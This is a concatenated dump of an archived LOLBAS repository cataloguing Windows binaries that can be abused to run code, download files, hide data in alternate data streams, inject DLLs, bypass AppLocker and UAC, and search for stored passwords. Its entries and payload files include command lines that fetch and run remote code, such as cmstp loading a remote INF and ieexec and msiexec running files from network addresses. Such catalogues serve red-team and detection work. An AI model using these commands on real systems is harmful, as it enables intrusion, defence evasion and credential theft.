Archive-Old-Version/LOLUtilz/OtherBinaries/Setup.yml ================================================ --- Name: Setup.exe Description: Execute Author: '' Created: 2018-05-25 Commands: - Command: Run Setup.exe Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload. Full_Path: - C:\LJ-Ent-700-color-MFP-M775-Full-Solution-15315 Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/994381620588236800 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml ================================================ --- Name: Update.exe Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation. Author: 'Jesus Galvez' Created: '2020-11-01' Commands: - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied. Usecase: Execute binary Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Whatsapp installed Full_Path: - Path: '%localappdata%\Whatsapp\Update.exe' Detection: - IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/Usbinst.yml ================================================ --- Name: Usbinst.exe Description: Execute Author: '' Created: 2018-05-25 Commands: - Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf" Description: Execute calc.exe through DefaultInstall Section Directive in INF file. Full_Path: - C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/993514357807108096 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/VBoxDrvInst.yml ================================================ --- Name: VBoxDrvInst.exe Description: Persistence Author: '' Created: 2018-05-25 Commands: - Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe Full_Path: - C:\Program Files\Oracle\VirtualBox Guest Additions Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/993497996179492864 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/aswrundll.yml ================================================ Name: aswrundll.exe Description: This process is used by AVAST antivirus to run and execute any modules Author: Eli Salem Created: '2019-03-19' Commands: - Command: '"C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll"' Description: Load and execute modules using aswrundll Usecase: Execute malicious modules using aswrundll.exe Category: Execute Privileges: Any OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: 'C:\Program Files\Avast Software\Avast\aswrundll' Code_Sample: - Code: '["C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" "C:\Users\module.dll"]' Resources: - Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research Acknowledgement: - Person: Eli Salem handle: 'https://www.linkedin.com/in/eli-salem-954728150' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml ================================================ --- Name: winword.exe Description: Document editor included with Microsoft Office. Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - Command: winword.exe /l dllfile.dll Description: Launch DLL payload. Usecase: Execute a locally stored DLL using winword.exe. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows Full_Path: - Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Code_Sample: - Code: Detection: - IOC: Resources: - Link: https://twitter.com/vysecurity/status/884755482707210241 - Link: https://twitter.com/Hexacorn/status/885258886428725250 Acknowledgement: - Person: Vincent Yiu (cmd) Handle: '@@vysecurity' - Person: Adam (Internals) Handle: '@Hexacorn' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherScripts/Testxlst.yml ================================================ --- Name: testxlst.js Description: Script included with Pywin32. Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out Description: Test Jscript included in Python tool to perform XSL transform (for payload execution). Category: Execution Privileges: User MitreID: T1064 OperatingSystem: Windows - Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out Description: Test Jscript included in Python tool to perform XSL transform (for payload execution). Category: Execution Privileges: User MitreID: T1064 OperatingSystem: Windows Full_Path: - c:\python27amd64\Lib\site-packages\win32com\test\testxslt.js (Visual Studio Installation) Code_Sample: [] Detection: [] Resources: - https://twitter.com/bohops/status/993314069116485632 - https://github.com/mhammond/pywin32 Acknowledgement: - Person: Jimmy Handle: '@bohops' ================================================ FILE: Archive-Old-Version/OSBinaries/Atbroker.exe.md ================================================ ## Atbroker.exe * Functions: Execute ``` ATBroker.exe /start malware Start a registered Assistive Technology (AT). ``` * Resources: * http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ * Full path: * C:\Windows\System32\Atbroker.exe * C:\Windows\SysWOW64\Atbroker.exe * Notes: Thanks to Adam - @hexacorn Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry. ================================================ FILE: Archive-Old-Version/OSBinaries/Bash.exe.md ================================================ ## Bash.exe * Functions: Execute ``` bash.exe -c calc.exe Execute calc.exe. ``` * Resources: * * Full path: * ? * Notes: Thanks to ? ================================================ FILE: Archive-Old-Version/OSBinaries/Bitsadmin.exe.md ================================================ ## Bitsadmin.exe * Functions: Execute, Download, Copy, Read ADS ``` bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1 Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset One-liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset One-Liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. ``` * Resources: * https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - Slide 53 * https://www.youtube.com/watch?v=_8xJaaQlpBo * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f * Full path: * c:\Windows\System32\bitsadmin.exe * c:\Windows\SysWOW64\bitsadmin.exe * Notes: Thanks to Rob Fuller - @mubix , Chris Gates - @carnal0wnage, Oddvar Moe - @oddvarmoe ================================================ FILE: Archive-Old-Version/OSBinaries/Certutil.exe.md ================================================ ## Certutil.exe * Functions: Download, Add ADS, Decode, Encode ``` certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe Download and save 7zip to disk in the current folder. certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt Download and save a PS1 file to an Alternate Data Stream (ADS). certutil -encode inputFileName encodedOutputFileName certutil -decode encodedInputFileName decodedOutputFileName Commands to encode and decode a file using Base64. ``` * Resources: * https://twitter.com/Moriarty_Meng/status/984380793383370752 * https://twitter.com/mattifestation/status/620107926288515072 * Full path: * c:\windows\system32\certutil.exe * c:\windows\sysWOW64\certutil.exe * Notes: Thanks to Matt Graeber - @mattifestation, Moriarty - @Moriarty2016 ================================================ FILE: Archive-Old-Version/OSBinaries/Cmdkey.exe.md ================================================ ## Cmdkey.exe * Functions: Credentials ``` cmdkey /list List cached credentials. ``` * Resources: * https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation * Full path: * c:\windows\system32\cmdkey.exe * c:\windows\sysWOW64\cmdkey.exe * Notes: ================================================ FILE: Archive-Old-Version/OSBinaries/Cmstp.exe.md ================================================ ## Cmstp.exe * Functions: Execute, UACBypass ``` cmstp.exe /ni /s c:\cmstp\CorpVPN.inf Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. ``` * Resources: * https://twitter.com/NickTyrer/status/958450014111633408 * https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 * https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e * https://oddvar.moe/2017/08/15/research-on-cmstp-exe/ * https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 (UAC Bypass) * https://github.com/hfiref0x/UACME * Full path: * C:\Windows\system32\cmstp.exe * C:\Windows\sysWOW64\cmstp.exe * Notes: Thanks to Oddvar Moe - @oddvarmoe, Nick Tyrer - @NickTyrer ================================================ FILE: Archive-Old-Version/OSBinaries/Control.exe.md ================================================ ## Control.exe * Functions: Execute, Read ADS ``` control.exe c:\windows\tasks\file.txt:evil.dll Execute evil.dll which is stored in an Alternate Data Stream (ADS). ``` * Resources: * https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ * https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ * https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/ * https://twitter.com/bohops/status/955659561008017409 * Full path: * C:\Windows\system32\control.exe * C:\Windows\sysWOW64\control.exe * Notes: Thanks to Jimmy - @bohops ================================================ FILE: Archive-Old-Version/OSBinaries/Csc.exe.md ================================================ ## Csc.exe * Functions: Compile ``` csc -out:My.exe File.cs Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe. csc -target:library File.cs ``` * Resources: * https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe * * Full path: * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe * Notes: Thanks to ? ================================================ FILE: Archive-Old-Version/OSBinaries/Cscript.exe.md ================================================ ## Cscript.exe * Functions: Execute, Read ADS ``` cscript c:\ads\file.txt:script.vbs Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS). ``` * Resources: * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ * Full path: * c:\windows\system32\cscript.exe * c:\windows\sysWOW64\cscript.exe * Notes: Thanks to Oddvar Moe - @oddvarmoe ================================================ FILE: Archive-Old-Version/OSBinaries/Dfsvc.exe.md ================================================ ## Dfsvc.exe * Functions: Execute ``` Missing Example ``` * Resources: * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf * Full path: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe * Notes: Thanks to Casey Smith - @subtee ================================================ FILE: Archive-Old-Version/OSBinaries/Diskshadow.exe.md ================================================ ## Diskshadow.exe * Functions: Execute, Dump NTDS.dit ``` diskshadow.exe /s c:\test\diskshadow.txt Execute commands using diskshadow.exe from a prepared diskshadow script. diskshadow> exec calc.exe Execute a calc.exe using diskshadow.exe. ``` * Resources: * https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ * Full path: * c:\windows\system32\diskshadow.exe * c:\windows\sysWOW64\diskshadow.exe * Notes: Thanks to Jimmy - @bohops ================================================ FILE: Archive-Old-Version/OSBinaries/Dnscmd.exe.md ================================================ ## Dnscmd.exe * Functions: Execute ``` dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll Adds a specially crafted DLL as a plug-in of the DNS Service. ``` * Resources: * https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 * https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html * https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp * https://twitter.com/Hexacorn/status/994000792628719618 * http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html * Full path: * c:\windows\system32\Dnscmd.exe * c:\windows\sysWOW64\Dnscmd.exe * Notes: This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the refference links for DLL details. Thanks to Shay Ber - ?, Dimitrios Slamaris - @dim0x69, Nikhil SamratAshok, Mittal - @nikhil_mitt ================================================ FILE: Archive-Old-Version/OSBinaries/Esentutl.exe.md ================================================ ## Esentutl.exe * Functions: Copy, Download, Write ADS, Read ADS ``` esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o Copies the source VBS file to the destination VBS file. esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o Copies the source EXE to an Alternate Data Stream (ADS) of the destination file. esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o Copies the source Alternate Data Stream (ADS) to the destination EXE. esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.txt:file.exe /o Copies the source EXE to the destination Alternate Data Stream (ADS) of the destination file. esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.exe /o Copies the source EXE to the destination EXE file. esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o Copies the source EXE to the destination EXE file ``` * Resources: * https://twitter.com/egre55/status/985994639202283520 * Full path: * c:\windows\system32\esentutl.exe * c:\windows\sysWOW64\esentutl.exe * Notes: Thanks to egre55 - @egre55 ================================================ FILE: Archive-Old-Version/OSBinaries/Expand.exe.md ================================================ ## Expand.exe * Functions: Download, Copy, Add ADS ``` expand \\webdav\folder\file.bat c:\ADS\file.bat Copies source file to destination. expand c:\ADS\file1.bat c:\ADS\file2.bat Copies source file to destination. expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat Copies source file to destination Alternate Data Stream (ADS). ``` * Resources: * https://twitter.com/infosecn1nja/status/986628482858807297 * https://twitter.com/Oddvarmoe/status/986709068759949319 * Full path: * c:\windows\system32\Expand.exe * c:\windows\sysWOW64\Expand.exe * Notes: Thanks to Rahmat Nurfauzi - @infosecn1nja, Oddvar Moe - @oddvarmoe ================================================ FILE: Archive-Old-Version/OSBinaries/Explorer.exe.md ================================================ ## Explorer.exe * Functions: Execute ``` explorer.exe calc.exe Executes calc.exe as a subprocess of explorer.exe. ``` * Resources: * https://twitter.com/bohops/status/986984122563391488 * Full path: * c:\windows\explorer.exe * c:\windows\sysWOW64\explorer.exe * Notes: Thanks to Jimmy - @bohops ================================================ FILE: Archive-Old-Version/OSBinaries/Extexport.exe.md ================================================ ## Extexport.exe * Functions: Execute ``` Extexport.exe c:\test foo bar Load a DLL located in the c:\\test folder with one of the following names: mozcrt19.dll, mozsqlite3.dll, or sqlite.dll ``` * Resources: * http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/ * Full path: * C:\Program Files\Internet Explorer\Extexport.exe * C:\Program Files\Internet Explorer(x86)\Extexport.exe * Notes: Thanks to Adam - @hexacorn ================================================ FILE: Archive-Old-Version/OSBinaries/Extrac32.exe.md ================================================ ## Extrac32.exe * Functions: Add ADS, Download ``` extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file. extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file. extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt Copy the source file to the destination file and overwrite it. ``` * Resources: * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f * https://twitter.com/egre55/status/985994639202283520 * Full path: * c:\windows\system32\extrac32.exe * c:\windows\sysWOW64\extrac32.exe * Notes: Thanks to Oddvar Moe - @oddvarmoe, egre55 - @egre55 ================================================ FILE: Archive-Old-Version/OSBinaries/Findstr.exe.md ================================================ ## Findstr.exe * Functions: Add ADS, Search ``` findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. findstr /S /I cpassword \\\sysvol\\policies\*.xml Search for stored password in Group Policy files stored on SYSVOL. ``` * Resources: * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f * Full path: * c:\windows\system32\findstr.exe * c:\windows\sysWOW64\findstr.exe * Notes: Thanks to Oddvar Moe - @oddvarmoe ================================================ FILE: Archive-Old-Version/OSBinaries/Forfiles.exe.md ================================================ ## Forfiles.exe * Functions: Execute, Read ADS ``` forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe Executes calc.exe since there is a match for notepad.exe in the c:\\windows\\System32 folder. forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\\windows\\system32 folder. ``` * Resources: * https://twitter.com/vector_sec/status/896049052642533376 * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ * Full path: * C:\Windows\system32\forfiles.exe * C:\Windows\sysWOW64\forfiles.exe * Notes: Thanks to Eric - @vector_sec, Oddvar Moe - @oddvarmoe ================================================ FILE: Archive-Old-Version/OSBinaries/Gpscript.exe.md ================================================ ## Gpscript.exe * Functions: Execute ``` Gpscript /logon Executes logon scripts configured in Group Policy. Gpscript /startup Executes startup scripts configured in Group Policy. ``` * Resources: * https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ * Full path: * c:\windows\system32\gpscript.exe * c:\windows\sysWOW64\gpscript.exe * Notes: Thanks to Oddvar Moe - @oddvarmoe Requires administrative rights and modifications to local group policy settings. ================================================ FILE: Archive-Old-Version/OSBinaries/IEExec.exe.md ================================================ ## IEExec.exe * Functions: Execute ``` ieexec.exe http://x.x.x.x:8080/bypass.exe Executes bypass.exe from the remote server. ``` * Resources: * https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ * Full path: * c:\windows\system32\ieexec.exe * c:\windows\sysWOW64\ieexec.exe * Notes: Thanks to Casey Smith - @subtee ================================================ FILE: Archive-Old-Version/OSBinaries/Ie4unit.exe.md ================================================ ## Ie4unit.exe * Functions: Execute ``` ie4unit.exe -BaseSettings Executes commands from a specially prepared ie4uinit.inf file. ``` * Resources: * https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ * Full path: * c:\windows\system32\ie4unit.exe * c:\windows\sysWOW64\ie4unit.exe * c:\windows\system32\ieuinit.inf * c:\windows\sysWOW64\ieuinit.inf * Notes: Thanks to Jimmy - @bohops ================================================ FILE: Archive-Old-Version/OSBinaries/InfDefaultInstall.exe.md ================================================ ## InfDefaultInstall.exe * Functions: Execute ``` InfDefaultInstall.exe Infdefaultinstall.inf Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. ``` * Resources: * https://twitter.com/KyleHanslovan/status/911997635455852544 * https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a * https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ * Full path: * c:\windows\system32\Infdefaultinstall.exe * c:\windows\sysWOW64\Infdefaultinstall.exe * Notes: Thanks to Kyle Hanslovan - @kylehanslovan ================================================ FILE: Archive-Old-Version/OSBinaries/InstallUtil.exe.md ================================================ ## InstallUtil.exe * Functions: Execute ``` InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll Execute the target .NET DLL or EXE. ``` * Resources: * https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 * http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md * https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ * Full path: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe * Notes: Thanks to Casey Smith - @subtee ================================================ FILE: Archive-Old-Version/OSBinaries/Makecab.exe.md ================================================ ## Makecab.exe * Functions: Package, Add ADS, Download ``` makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab Compresses the target file and stores it in the target file. makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. ``` * Resources: * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f * Full path: * c:\windows\system32\makecab.exe * c:\windows\sysWOW64\makecab.exe * Notes: Thanks to Oddvar Moe - @oddvarmoe ================================================ FILE: Archive-Old-Version/OSBinaries/Mavinject.exe.md ================================================ ## Mavinject.exe * Functions: Execute, Read ADS ``` MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll Inject evil.dll into a process with PID 3110. Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172. ``` * Resources: * https://twitter.com/gN3mes1s/status/941315826107510784 * https://twitter.com/Hexcorn/status/776122138063409152 * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ * Full path: * C:\Windows\System32\mavinject.exe * C:\Windows\SysWOW64\mavinject.exe * Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s, Adam - @hexacorn, Oddvar Moe - @oddvarmoe ================================================ FILE: Archive-Old-Version/OSBinaries/Microsoft.Wrokflow.Compiler.xml ================================================ Microsoft.Workflow.Compiler.xoml false true false false -1 false false false CSharp ================================================ FILE: Archive-Old-Version/OSBinaries/Microsoft.Wrokflow.Compiler.xoml ================================================ ================================================ FILE: Archive-Old-Version/OSBinaries/Msbuild.exe.md ================================================ ## Msbuild.exe * Functions: Execute ``` msbuild.exe pshell.xml Build and execute a C# project stored in the target XML file. msbuild.exe Msbuild.csproj Build and execute a C# project stored in the target CSPROJ file. ``` * Resources: * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md * https://github.com/Cn33liz/MSBuildShell * https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ * Full path: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe * C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe * C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe * Notes: Thanks to Casey Smith - @subtee, Cn33liz - @Cneelis ================================================ FILE: Archive-Old-Version/OSBinaries/Msconfig.exe.md ================================================ ## Msconfig.exe * Functions: Execute ``` Msconfig.exe -5 Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml. ``` * Resources: * https://twitter.com/pabraeken/status/991314564896690177 * Full path: * c:\windows\system32\msconfig.exe * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken See the Payloads folder for an example mscfgtlc.xml file. ================================================ FILE: Archive-Old-Version/OSBinaries/Msdt.exe.md ================================================ ## Msdt.exe * Functions: Execute ``` Open .diagcab package msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. ``` * Resources: * https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ * https://twitter.com/harr0ey/status/991338229952598016 * Full path: * C:\Windows\System32\Msdt.exe * C:\Windows\SysWOW64\Msdt.exe * Notes: Thanks to: See the Payloads folder for an example PCW8E57.xml file. ================================================ FILE: Archive-Old-Version/OSBinaries/Msiexec.exe.md ================================================ ## Msiexec.exe * Functions: Execute ``` msiexec /quiet /i cmd.msi Installs the target .MSI file silently. msiexec /q /i http://192.168.100.3/tmp/cmd.png Installs the target remote & renamed .MSI file silently. msiexec /y "C:\folder\evil.dll" Calls DLLRegisterServer to register the target DLL. msiexec /z "C:\folder\evil.dll" Calls DLLRegisterServer to un-register the target DLL. ``` * Resources: * https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/ * https://twitter.com/PhilipTsukerman/status/992021361106268161 * Full path: * c:\windows\system32\msiexec.exe * c:\windows\sysWOW64\msiexec.exe * Notes: Thanks to ? - @netbiosX, PhilipTsukerman - @PhilipTsukerman ================================================ FILE: Archive-Old-Version/OSBinaries/Netsh.exe.md ================================================ ## Netsh.exe * Functions: Execute, Surveillance ``` netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!() netsh.exe trace show status Capture network traffic on remote file share. netsh.exe add helper C:\Path\file.dll Load (execute) NetSh.exe helper DLL file. netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 Forward traffic from the listening address and proxy to a remote system. ``` * Resources: * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md * https://attack.mitre.org/wiki/Technique/T1128 * https://twitter.com/teemuluotio/status/990532938952527873 * Full path: * C:\Windows\System32 * C:\Windows\SysWOW64 * Notes: ================================================ FILE: Archive-Old-Version/OSBinaries/Nltest.exe.md ================================================ ## Nltest.exe * Functions: Credentials ``` nltest.exe /SERVER:192.168.1.10 /QUERY ``` * Resources: * https://twitter.com/sysopfb/status/986799053668139009 * https://ss64.com/nt/nltest.html * Full path: * c:\windows\system32\nltest.exe * Notes: Thanks to Sysopfb - @sysopfb ================================================ FILE: Archive-Old-Version/OSBinaries/Openwith.exe.md ================================================ ## Openwith.exe * Functions: Execute ``` OpenWith.exe /c C:\test.hta Opens the target file with the default application. OpenWith.exe /c C:\testing.msi Opens the target file with the default application. ``` * Resources: * https://twitter.com/harr0ey/status/991670870384021504 * Full path: * c:\windows\system32\Openwith.exe * c:\windows\sysWOW64\Openwith.exe * Notes: Thanks to Matt harr0ey - @harr0ey ================================================ FILE: Archive-Old-Version/OSBinaries/Payload/Cmstp.inf ================================================ [version] Signature=$chicago$ AdvancedINF=2.5 [DefaultInstall_SingleUser] UnRegisterOCXs=UnRegisterOCXSection [UnRegisterOCXSection] %11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp_calc.sct [Strings] AppAct = "SOFTWARE\Microsoft\Connection Manager" ServiceName="Yay" ShortSvcName="Yay" ================================================ FILE: Archive-Old-Version/OSBinaries/Payload/Cmstp_calc.sct ================================================ ================================================ FILE: Archive-Old-Version/OSBinaries/Payload/Evil.xbap ================================================ private void Button_click(object sender, RoutedEventArgs e) { if (RadioButton1.IsChecked == true) { Process.Start("C:\\poc\\evil.exe"); MessageBox.Show("BHello."); } } ================================================ FILE: Archive-Old-Version/OSBinaries/Payload/Infdefaultinstall.inf ================================================ [Version] Signature=$CHICAGO$ [DefaultInstall] UnregisterDlls = Squiblydoo [Squiblydoo] 